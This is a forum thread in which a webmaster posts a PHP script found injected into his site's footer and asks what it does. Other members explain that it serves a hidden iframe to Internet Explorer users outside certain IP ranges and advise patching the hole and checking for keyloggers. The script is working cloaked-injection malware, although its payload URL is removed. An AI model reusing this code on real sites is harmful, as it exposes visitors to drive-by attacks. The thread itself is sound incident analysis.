Welcome to WebmasterWorld Guest from 54.234.8.146

Forum Moderators: coopster & jatar k

Message Too Old, No Replies

Site Compromised. Need Help Understanding This Script

     

Dead_Elvis

5:24 pm on Mar 11, 2011 (gmt 0)

5+ Year Member



Hi,

I don't know if this is the correct forum for this or not, so please excuse me if I'm not in the correct place.

This morning I kind of accidentally discovered that my site had been compromised. What I found was this script being loaded in the footer of my pages.

I don't know enough about the code used to understand what it does... would anyone like to help me figure it out?

Thanks in advance!

<?
function net_match ( $network , $ip ) {
$ip_arr = explode ( '/' , $network );
$network_long = ip2long ( $ip_arr [ 0 ]);
$x = ip2long ( $ip_arr [ 1 ]);
$mask = long2ip ( $x ) == $ip_arr [ 1 ] ? $x : 0xffffffff << ( 32 - $ip_arr [ 1 ]);
$ip_long = ip2long ( $ip );
return ( $ip_long & $mask ) == ( $network_long & $mask );
}

function net()
{
$ip=$_SERVER['REMOTE_ADDR'];

if(
net_match('64.***.160.0/19',$ip)==0 &&
net_match('66.***.0.0/20',$ip)==0 &&
net_match('66.***.64.0/19',$ip)==0 &&
net_match('72.***.192.0/18',$ip)==0 &&
net_match('74.***.0.0/16',$ip)==0 &&
net_match('89.***.224.0/24',$ip)==0 &&
net_match('193.***.125.0/24',$ip)==0 &&
net_match('194.***.194.0/24',$ip)==0 &&
net_match('209.***.128.0/17',$ip)==0 &&
net_match('216.***.32.0/19',$ip)==0 &&
net_match('128.***.0.0/16',$ip)==0 &&
net_match('67.***.0.0/16',$ip)==0 &&
net_match('188.***.0.0/16',$ip)==0
)
return true;
}

function detect_os() {
global $os;
$user_agent = $_SERVER['HTTP_USER_AGENT'];
if(strpos($user_agent, "Windows") !== false) $os = 'windows';
}detect_os();


function detect_brows() {
global $OOOOO0000, $OOOOOO000;
$user_agent = $_SERVER["HTTP_USER_AGENT"];
if (preg_match("/MSIE 6.0/", $user_agent) OR
preg_match("/MSIE 7.0/", $user_agent) OR
preg_match("/MSIE 8.0/", $user_agent)
) $OOOOOO000 = "MSIE";
}detect_brows();

$IP = "{$_SERVER[REMOTE_ADDR]}.log";

function _log()
{ global $IP;
touch ("/tmp/freshnews/{$IP}");
}

function _check()
{
global $IP;
if(!file_exists("/tmp/freshnews/{$IP}")) return true;
}
$sfkg=base64_decode('[alphanumeric string]');
if(_check())
{
if(net())
{
if($os)
{
if($OOOOOO000 == "MSIE")
{
echo 'document.write(\'<iframe frameborder=0 src="'.$sfkg.'" width=1 height=1 scrolling=no></iframe>\');';

_log();

}}}}

[edited by: tedster at 7:33 pm (utc) on Mar 12, 2011]
[edit reason] obscure specifics [/edit]

topr8

5:47 pm on Mar 11, 2011 (gmt 0)

WebmasterWorld Senior Member topr8 is a WebmasterWorld Top Contributor of All Time 10+ Year Member



it doesn't matter what it does, you've got to patch the hole in your security.

... at a glance it serves an iframe, doubtless with a dubious source to internet explorer users who are not from the ip ranges shown

Dead_Elvis

5:52 pm on Mar 11, 2011 (gmt 0)

5+ Year Member



Thanks topr8,

Yes, I am in the process of finding and patching the hole. They seem to have accessed the site via FTP.

It seemed like knowing what the script does would help me find any other compromised files, directories, etc.

Thanks again.

jimbeetle

6:06 pm on Mar 11, 2011 (gmt 0)

WebmasterWorld Senior Member jimbeetle is a WebmasterWorld Top Contributor of All Time 10+ Year Member



They seem to have accessed the site via FTP

Then be sure to check your local machine for a keylogger, scrub it good if one is found, then change all your passwords.
 

Featured Threads

Hot Threads This Week

Hot Threads This Month